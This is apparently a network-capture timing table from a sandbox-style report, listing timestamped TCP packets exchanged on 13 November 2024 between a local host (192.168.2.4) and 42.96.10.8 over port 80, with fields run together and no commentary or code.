                                                                                                                                                                                                            Nov 13, 2024 13:25:19.082252026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.091887951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.091906071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.091922045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.092036009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.092036009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.093106985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.093122959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.093138933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.093202114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111157894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111174107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111188889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111212969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111218929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111236095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111252069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111290932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111290932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111345053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111361027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111378908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111393929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111408949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111421108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111421108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111468077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111500025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111511946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111527920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111568928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111584902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111625910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111852884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111886978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111905098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111916065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111922026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111939907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111954927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111974955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111980915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.111999989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112016916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112032890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112041950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112041950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112051010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112068892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112087965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112104893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112118006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112118006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112122059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112143040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112159014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112170935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112170935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112189054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112205029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112221003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112236977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112246990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112246990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112266064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112281084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112298965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112323999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112324953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112324953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112340927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112358093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112370968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112375021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112404108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112421036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112426043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112438917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112457037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112473011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112482071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112488985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112504005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112517118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112517118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112520933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112540007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112555981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112572908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112597942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112597942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112617016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112643003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112658024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112693071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112744093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112744093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112752914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112771988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112828016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112852097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112869024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112884045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112901926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112910986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112910986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112919092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112927914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112955093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112982035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.112997055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113045931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113045931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113076925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113115072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113131046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113177061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113178015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113177061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113197088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113218069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113234043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113290071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113290071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113291025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113308907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113374949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113468885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113471031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113497972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113516092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113531113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113547087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113557100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113557100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113564968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113586903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113622904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113636971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113651991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113668919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113684893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.113727093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.115339994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154355049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154444933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154481888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154539108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154567957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154601097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154603004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154778957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154802084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154812098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154812098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154850960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154876947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154892921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154907942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.154921055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.157100916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.198107958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.198132992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.198151112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.203336954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.207578897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.207634926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.207652092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.207679987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.208589077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.208645105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.208661079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.208748102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.208776951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.208776951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.209813118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.226849079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.226874113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.226891994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.226919889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.226974964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.226990938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227018118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227035046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227051973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227081060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227081060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227081060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227097988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227114916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227130890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227144957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227144957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227149963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227191925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227231026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227247000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227263927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227283955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227283955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227368116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227385998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227401972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227438927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227466106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227494001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227500916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227500916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227514029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227528095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227544069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227559090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227575064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227613926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227613926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227638960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227653027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227669001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227684975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227699995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227700949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227741003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227751017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227758884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227773905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227787018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227802038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227816105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227833033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227833033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227854013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227869034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227885962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227900982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227916956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227932930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227958918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227958918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227963924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227977991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.227984905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228051901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228120089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228135109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228163004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228194952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228210926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228225946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228243113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228252888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228270054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228285074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228302002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228312016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228312016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228317022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228333950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228352070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228368998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228378057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228388071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228389025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228400946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228418112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228430033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228430033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228471041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228487015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228487968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228503942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228581905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228596926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228612900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228627920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228629112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228646040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228657007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228657007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228662968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228681087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228754044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228770971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228784084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228784084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228789091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228805065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228847980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.228863001 CET804973342.96.10.8192.168.2.4
